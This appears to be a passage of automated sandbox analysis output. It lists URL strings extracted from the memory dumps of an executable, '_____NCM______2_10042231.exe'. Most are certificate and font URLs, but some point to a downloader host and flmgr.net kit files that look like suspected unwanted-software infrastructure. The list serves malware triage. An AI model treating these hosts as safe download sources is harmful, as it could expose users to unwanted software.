Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://downloader.regeeve.com/client/debugq
Source: _____NCM______2_10042231.exe, 00000000.00000003.423909777.0000000006502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://narwhaljs.org)
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: _____NCM______2_10042231.exe, 00000000.00000002.734607528.0000000006571000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-img.flmgr.net/20230713170812.png
Source: _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-img.flmgr.net/20230713171652.png
Source: _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-img.flmgr.net/20230713172803.png
Source: _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-img.flmgr.net/20230717170650.png
Source: _____NCM______2_10042231.exe, 00000000.00000003.538483821.00000000061A1000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661196321.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static.flmgr.net/green/1.0.6.2.png
Source: _____NCM______2_10042231.exe, 00000000.00000003.538483821.00000000061A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static.flmgr.net/green/1.2.3
Source: _____NCM______2_10042231.exe, 00000000.00000002.732037821.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538348148.0000000004948000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661196321.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static.flmgr.net/green/1.2.32.1.png
Source: _____NCM______2_10042231.exe, 00000000.00000002.733702466.0000000004850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static.flmgr.net/green/FLManager_Green_1.0.0.11.exe/537O6
Source: FLMgrTray.exeString found in binary or memory: http://static.flmgr.net/kit/KitTip.dll
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wiki.commonjs.org/wiki/Unit_Testing/1.0
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423584361.0000000006505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlm=
Source: _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423682627.00000000064FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
Source: _____NCM______2_10042231.exe, 00000000.00000003.423682627.00000000064FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com8
Source: _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comK
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: _____NCM______2_10042231.exe, 00000000.00000003.423682627.00000000064FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn:
Source: _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.
Source: _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.=
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: _____NCM______2_10042231.exe, 00000000.00000003.538128273.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.flmgr.net/win_
Source: _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661196321.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.flmgr.net/win_agreement.html
Source: _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.flmgr.net/win_agreement.htmlmgD
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.flmgr.net/win_fl_agreement.htmlRptMain.xml_USERPROFILEGeneralDisplayNameSoftidWebidSdsoft
Source: _____NCM______2_10042231.exe, 00000000.00000002.734533612.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661144107.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432093652.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432454977.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432564971.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434764757.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434235117.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431916842.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433771181.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432042950.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.428179724.00000000064FC000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433408005.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433174815.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432958424.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.435073362.0000000006503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
Source: _____NCM______2_10042231.exe, 00000000.00000003.428179724.00000000064FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
Source: _____NCM______2_10042231.exe, 00000000.00000003.428179724.00000000064FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/
Source: _____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431688863.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427768774.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427662253.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427866698.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427695997.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427781391.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427816689.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427714202.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427836544.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427887164.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427852070.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427730968.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427754876.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.427802079.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: _____NCM______2_10042231.exe, 00000000.00000003.428179724.00000000064FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers9
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: _____NCM______2_10042231.exe, 00000000.00000003.431688863.0000000006500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersL
Source: _____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431688863.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
Source: _____NCM______2_10042231.exe, 00000000.00000003.428179724.00000000064FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsy
Source: _____NCM______2_10042231.exe, 00000000.00000003.432093652.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432454977.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432564971.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434764757.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434235117.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431916842.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433771181.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432042950.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431688863.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433408005.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433174815.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432958424.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.435073362.0000000006503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comicva
Source: _____NCM______2_10042231.exe, 00000000.00000002.734533612.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661144107.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432093652.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432454977.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432564971.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434764757.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434235117.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431916842.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433771181.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432042950.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433408005.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433174815.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432958424.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.435073362.0000000006503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comionmJ
Source: _____NCM______2_10042231.exe, 00000000.00000003.428179724.00000000064FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtou
Source: _____NCM______2_10042231.exe, 00000000.00000003.421630345.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
Source: _____NCM______2_10042231.exe, 00000000.00000003.421607485.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comO
Source: _____NCM______2_10042231.exe, 00000000.00000003.421650781.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421630345.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comc
Source: _____NCM______2_10042231.exe, 00000000.00000003.422822441.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423169608.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423601209.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422855231.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423334203.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422995187.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423139350.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423395555.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422618740.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422742801.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422704883.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422583482.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422666610.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423198928.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422921602.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423362129.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423302938.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423537700.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423269003.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: _____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
Source: _____NCM______2_10042231.exe, 00000000.00000003.423169608.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422855231.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423334203.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422995187.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423139350.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423198928.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422921602.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423362129.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423302938.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423269003.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423104392.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423250916.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/E
Source: _____NCM______2_10042231.exe, 00000000.00000003.422321316.0000000006502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/H
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: _____NCM______2_10042231.exe, 00000000.00000003.422822441.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422855231.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422742801.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422704883.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422666610.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422770041.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422796464.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn7
Source: _____NCM______2_10042231.exe, 00000000.00000003.422822441.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423169608.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423601209.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422855231.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423334203.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422995187.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423139350.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423395555.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422618740.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422742801.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422704883.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422583482.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422666610.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423198928.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422921602.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423362129.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423302938.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423537700.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423269003.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423436039.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnY
Source: _____NCM______2_10042231.exe, 00000000.00000003.422522906.0000000006505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnher
Source: _____NCM______2_10042231.exe, 00000000.00000003.422822441.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422855231.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422995187.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422921602.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422770041.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422796464.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423104392.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnm
Source: _____NCM______2_10042231.exe, 00000000.00000003.422522906.0000000006505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cntte;
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: _____NCM______2_10042231.exe, 00000000.00000003.429012421.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429095949.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429061335.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.428992249.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429076660.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429045987.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429108521.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmf
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: _____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.krn
Source: _____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.krsu
